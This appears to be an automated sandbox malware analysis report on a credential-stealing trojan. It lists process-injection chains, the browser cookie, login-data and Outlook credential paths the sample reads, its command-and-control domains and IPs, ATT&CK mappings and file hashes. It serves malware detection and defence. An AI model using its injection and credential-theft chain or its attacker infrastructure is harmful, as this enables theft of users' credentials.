            Source: C:\Windows\SysWOW64\chkntfs.exe  Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\chkntfs.exe  Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\chkntfs.exe  Thread register set: target process: 4544
            Source: C:\Windows\SysWOW64\chkntfs.exe  Thread APC queued: target process: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe  Memory written: C:\Windows\SysWOW64\svchost.exe base: 30C8008
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe  Code function: 0_2_009E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,  0_2_009E1201
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe  Code function: 0_2_009C2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,  0_2_009C2BA5
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe  Code function: 0_2_009EB226 SendInput,keybd_event,  0_2_009EB226
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe  Code function: 0_2_00A022DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,  0_2_00A022DA
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe  Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\p4LNUqyKZM.exe"
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  Process created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"
            Source: C:\Windows\SysWOW64\chkntfs.exe  Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe  Code function: 0_2_009E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,  0_2_009E0B62
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe  Code function: 0_2_009E1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,  0_2_009E1663
            Source: p4LNUqyKZM.exe  Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: p4LNUqyKZM.exe, SCsLZYqthBle.exe, 00000002.00000002.3535728299.0000000000C91000.00000002.00000001.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000002.00000000.1809890288.0000000000C91000.00000002.00000001.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000002.3536020379.0000000001701000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Shell_TrayWnd
            Source: SCsLZYqthBle.exe, 00000002.00000002.3535728299.0000000000C91000.00000002.00000001.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000002.00000000.1809890288.0000000000C91000.00000002.00000001.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000002.3536020379.0000000001701000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progman
            Source: SCsLZYqthBle.exe, 00000002.00000002.3535728299.0000000000C91000.00000002.00000001.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000002.00000000.1809890288.0000000000C91000.00000002.00000001.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000002.3536020379.0000000001701000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progmanlock
            Source: SCsLZYqthBle.exe, 00000002.00000002.3535728299.0000000000C91000.00000002.00000001.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000002.00000000.1809890288.0000000000C91000.00000002.00000001.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000002.3536020379.0000000001701000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe  Code function: 0_2_009A0698 cpuid  0_2_009A0698
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe  Code function: 0_2_009F8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,  0_2_009F8195
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe  Code function: 0_2_009DD27A GetUserNameW,  0_2_009DD27A
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe  Code function: 0_2_009BBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,  0_2_009BBB6F
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe  Code function: 0_2_009842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,  0_2_009842DE

            Stealing of Sensitive Information

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3535173412.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3536085232.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1885323394.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3537571964.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1884974857.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3536123647.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3536023408.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1889613718.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\chkntfs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\chkntfs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: p4LNUqyKZM.exe | Binary or memory string: WIN_81
Source: p4LNUqyKZM.exe | Binary or memory string: WIN_XP
Source: p4LNUqyKZM.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: p4LNUqyKZM.exe | Binary or memory string: WIN_XPe
Source: p4LNUqyKZM.exe | Binary or memory string: WIN_VISTA
Source: p4LNUqyKZM.exe | Binary or memory string: WIN_7
Source: p4LNUqyKZM.exe | Binary or memory string: WIN_8

            Remote Access Functionality

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3535173412.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3536085232.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1885323394.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3537571964.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1884974857.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3536123647.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3536023408.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1889613718.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_00A01204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_00A01204
Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_00A01806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00A01806
MITRE ATT&CK Matrix

Tactics (matrix columns): Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact. Techniques prefixed with a number were matched in this analysis; the number is the count of matching signatures. Unnumbered techniques are the unmatched cells of the matrix.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 12 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 241 Security Software Discovery; 12 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph

Behavior Graph ID: 1503359 | Sample: p4LNUqyKZM.exe | Startdate: 03/09/2024 | Architecture: WINDOWS | Score: 100

Process tree and per-node signatures recovered from the graph:

• p4LNUqyKZM.exe (started): Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection; Writes to foreign memory regions; 2 other signatures
  • svchost.exe (started by p4LNUqyKZM.exe): Maps a DLL or memory area into another process
    • SCsLZYqthBle.exe (injected by svchost.exe): Found direct / indirect Syscall (likely to bypass EDR)
      • chkntfs.exe (started by SCsLZYqthBle.exe): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
        • SCsLZYqthBle.exe (injected by chkntfs.exe): Found direct / indirect Syscall (likely to bypass EDR); network contacts: www.dfbio.net 218.247.68.184 (ports 49770, 49771, 80; WEST263GO-HKWest263InternationalLimitedHK, China), www.fineg.online 162.0.239.141 (ports 49750, 49751, 49752; NAMECHEAP-NETUS, Canada), 6 other IPs or domains
        • firefox.exe (started by chkntfs.exe)

Sample-level nodes: DNS to www.asian-massage-us.xyz (Performs DNS queries to domains with low reputation), www.thriveline.online and 13 other IPs or domains; Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 4 other signatures

Antivirus Detection

Initial sample (Source | Detection | Scanner | Label):
p4LNUqyKZM.exe | 42% | ReversingLabs | Win32.Trojan.Strab
p4LNUqyKZM.exe | 37% | Virustotal
p4LNUqyKZM.exe | 100% | Joe Sandbox ML
Dropped files: No Antivirus matches
Unpacked PE files: No Antivirus matches
General Information

Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1503359
Start date and time: 2024-09-03 12:44:37 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: p4LNUqyKZM.exe (renamed because the original name is a hash value)
Original Sample Name: 416e839248fccc61a17a02d1513127612b89425f45ddf603800f1def225adb07.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@12/8
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 54
• Number of non-executed functions: 297
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 92.204.80.11
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, whois-unverified.domainbox.akadns.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Time | Type | Description
06:46:26 | API Interceptor | 7415661x Sleep call for process: chkntfs.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
5.144.130.52
  INV20240828.exe | malicious | FormBook
  • www.aflaksokna.com/ifo8/
162.0.239.141
  INV20240828.exe | malicious | FormBook
  • www.fineg.online/mkan/
  Quotation-27-08-24.exe | malicious | FormBook
  • www.stolex.top/kunq/
218.247.68.184
  INV20240828.exe | malicious | FormBook
  • www.dfbio.net/yzen/
  rRFQ.bat.exe | malicious | FormBook
  • www.dfbio.net/a3cb/
199.59.243.226
  PO#86637.exe | malicious | FormBook
  • www.dom-2.online/m409/
  PI 30_08_2024.exe | malicious | FormBook
  • www.dom-2.online/m409/
  http://cpsenrgy.com | malicious | Unknown
  • cpsenrgy.com/_tr
  ORDER_pdf.exe | malicious | FormBook
  • www.marchingnorth.shop/z97i/
  Paul Meeting Proposal and Schedule.xls | malicious | FormBook
  • www.foundation-repair.biz/5l7s/
  INV20240828.exe | malicious | FormBook
  • www.asian-massage-us.xyz/kc69/
  Paul Agrotis List.xls | malicious | FormBook
  • www.foundation-repair.biz/5l7s/
  8mwXY7Lh2phgnOz.exe | malicious | FormBook
  • www.972.studio/d16h/?8p4=Yyg0mkT9kWaBGz3P4SAFDjh7bHhcAIEcMMaswnvDe8XCEKQH+wdYsDPfbHrPjzeNnPr0&tZId=0tE43nlx
  bintoday1.exe | malicious | FormBook
  • www.dom-2.online/6t1p/
154.23.184.240
  PO#86637.exe | malicious | FormBook
  • www.hm62t.top/edpl/
  PI 30_08_2024.exe | malicious | FormBook
  • www.hm62t.top/edpl/
  INV20240828.exe | malicious | FormBook
  • www.d55dg.top/ftud/
  factura-630.900.exe | malicious | FormBook
  • www.hm62t.top/edpl/
  PAGO $630.900.exe | malicious | FormBook
  • www.hm62t.top/edpl/
  AIDHL3290435890.exe | malicious | FormBook
  • www.hm62t.top/p39s/
  PO#4510065525.exe | malicious | FormBook
  • www.hm62t.top/p39s/
  Debit note Jan-Jul 2024.exe | malicious | FormBook
  • www.d55dg.top/w1w3/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.qiluqiyuan.buzz
  INV20240828.exe | malicious | FormBook
  • 161.97.168.245
  AIDHL3290435890.exe | malicious | FormBook
  • 161.97.168.245
  PO#4510065525.exe | malicious | FormBook
  • 161.97.168.245
www.myim.cloud
  ORDER_pdf.exe | malicious | FormBook
  • 199.59.243.226
  INV20240828.exe | malicious | FormBook
  • 199.59.243.226
  ORDER_38746_pdf.exe | malicious | FormBook
  • 199.59.243.226
www.dfbio.net
  INV20240828.exe | malicious | FormBook
  • 218.247.68.184
  rRFQ.bat.exe | malicious | FormBook
  • 218.247.68.184
www.asian-massage-us.xyz
  INV20240828.exe | malicious | FormBook
  • 199.59.243.226
www.fineg.online
  INV20240828.exe | malicious | FormBook
  • 162.0.239.141
www.clientebradesco.online
  INV20240828.exe | malicious | FormBook
  • 45.33.23.183
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HOSTIRAN-NETWORKIR
  DOCUMENTS.vbs | malicious | AgentTesla
  • 5.144.130.41
  INV20240828.exe | malicious | FormBook
  • 5.144.130.52
  Payment-Details.scr.exe | malicious | AgentTesla
  • 5.144.130.41
  rDHL_PT563857935689275783656385FV-GDS3535353.bat | malicious | FormBook, GuLoader
  • 185.83.114.124
  rFV-452747284IN.bat | malicious | FormBook, GuLoader
  • 185.83.114.124
  Shipping Docs.rdf.exe | malicious | AgentTesla, PureLog Stealer
  • 5.144.130.49
  PAYMENT LIST.exe | malicious | AgentTesla, PureLog Stealer
  • 5.144.130.49
  PO# CV-PO23002552.PDF.exe | malicious | AgentTesla, PureLog Stealer
  • 5.144.130.49
  PO# CV-PO23002552.exe | malicious | AgentTesla, PureLog Stealer
  • 5.144.130.35
NAMECHEAP-NETUS
  https://dfcvgf-f42780.ingress-erytho.ewp.live/wp-content/plugins/sdnww/pages/region.php | malicious | Unknown
  • 63.250.43.133
  sBX8VM67ZE.exe | malicious | FormBook
  • 162.0.238.43
  PO 7001628119_61900PM.exe | malicious | FormBook, GuLoader
  • 162.0.239.223
  COTIZACION 290824.exe | malicious | FormBook
  • 63.250.47.40
  Play____Now_AUD__autoresponse.htm | malicious | HTMLPhisher
  • 199.192.22.193
  ORDER_pdf.exe | malicious | FormBook
  • 63.250.47.40
  INV20240828.exe | malicious | FormBook
  • 162.0.239.141
  DPPLYAD_12872 PDF.exe | malicious | FormBook
  • 198.54.116.16
  ORDER_38746_pdf.exe | malicious | FormBook
  • 63.250.47.40
WEST263GO-HKWest263InternationalLimitedHK
  INV20240828.exe | malicious | FormBook
  • 218.247.68.184
  rRFQ.bat.exe | malicious | FormBook
  • 218.247.68.184
  KKveTTgaAAsecNNaaaa.spc.elf | malicious | Unknown
  • 103.24.254.174
  https://mytonwallte.io/ | malicious | Unknown
  • 103.43.188.221
  Yb6ztdvQaB.elf | malicious | Unknown
  • 103.120.80.111
  pismo1A 12.06.2024.exe | malicious | FormBook
  • 103.120.80.111
  CFV20240600121.exe | malicious | FormBook
  • 103.120.80.111
  9wDlG5DeRK.elf | malicious | Moobot
  • 103.108.210.142
  PD1Afd15RS.elf | malicious | Mirai
  • 103.24.254.161
BODIS-NJUS
  NOAH CRYPT.exe | malicious | FormBook
  • 199.59.243.226
  PO#86637.exe | malicious | FormBook
  • 199.59.243.226
  PI 30_08_2024.exe | malicious | FormBook
  • 199.59.243.226
  play.exe | malicious | FormBook
  • 199.59.243.226
  http://cpsenrgy.com | malicious | Unknown
  • 199.59.243.226
  ORDER_pdf.exe | malicious | FormBook
  • 199.59.243.226
  Paul Meeting Proposal and Schedule.xls | malicious | FormBook
  • 199.59.243.226
  INV20240828.exe | malicious | FormBook
  • 199.59.243.226
  Paul Agrotis List.xls | malicious | FormBook
  • 199.59.243.226
                      No context
                      No context
                      Process:C:\Users\user\Desktop\p4LNUqyKZM.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):289280
                      Entropy (8bit):7.994772609984253
                      Encrypted:true
                      SSDEEP:6144:COx1UV7WGHK6uWBM6NGBX4V4AzoB5vZx/BB26jX+EmVaaGFFcqaJJOeMO:CO/QZ5pV4vtXXI/uFcqaJJ3MO
                      MD5:9E727CACC162F14482B7C2077F0D7109
                      SHA1:E35B92081819C2E5CAC12CC88C9687C3CE9FBF07
                      SHA-256:DEBE93B072D3A70C2AA37FADC6073DDF5C9C80CFD24F6FA8247014B5282A307A
                      SHA-512:BBA1C85B2106AD4685A6B7AE72E77EE03B8A551271BB965A54D2941E827309DEC555D1C7B52CA5F7FCD892357568E424D4476988C3C17AD744CFDB9D133FE128
                      Malicious:false
                      Reputation:low
                      Preview:..u..3RNC...\..d.V4..m3R...NCFU1UFOJEXEV7QILE0ZO3RNCFU1UF.JEXKI._I.L.{.2..b.=X&f?8*?77Zq*-+^5;.0+c4 _u/!j...vZ>-)k=WE.RNCFU1U?NC.e%1.l)+..:(.H..oQ2.U..y6P.S...f/T..*%=.5!.JEXEV7QI..0Z.2SNi".iUFOJEXEV.QKMN1QO3.JCFU1UFOJExQV7QYLE0*K3RN.FU!UFOHEXCV7QILE0\O3RNCFU1%BOJGXEV7QINEp.O3BNCVU1UF_JEHEV7QILU0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXk"R)=LE0^.7RNSFU1.BOJUXEV7QILE0ZO3RNcFUQUFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU
                      Process:C:\Users\user\Desktop\p4LNUqyKZM.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):289280
                      Entropy (8bit):7.994772609984253
                      Encrypted:true
                      SSDEEP:6144:COx1UV7WGHK6uWBM6NGBX4V4AzoB5vZx/BB26jX+EmVaaGFFcqaJJOeMO:CO/QZ5pV4vtXXI/uFcqaJJ3MO
                      MD5:9E727CACC162F14482B7C2077F0D7109
                      SHA1:E35B92081819C2E5CAC12CC88C9687C3CE9FBF07
                      SHA-256:DEBE93B072D3A70C2AA37FADC6073DDF5C9C80CFD24F6FA8247014B5282A307A
                      SHA-512:BBA1C85B2106AD4685A6B7AE72E77EE03B8A551271BB965A54D2941E827309DEC555D1C7B52CA5F7FCD892357568E424D4476988C3C17AD744CFDB9D133FE128
                      Malicious:false
                      Reputation:low
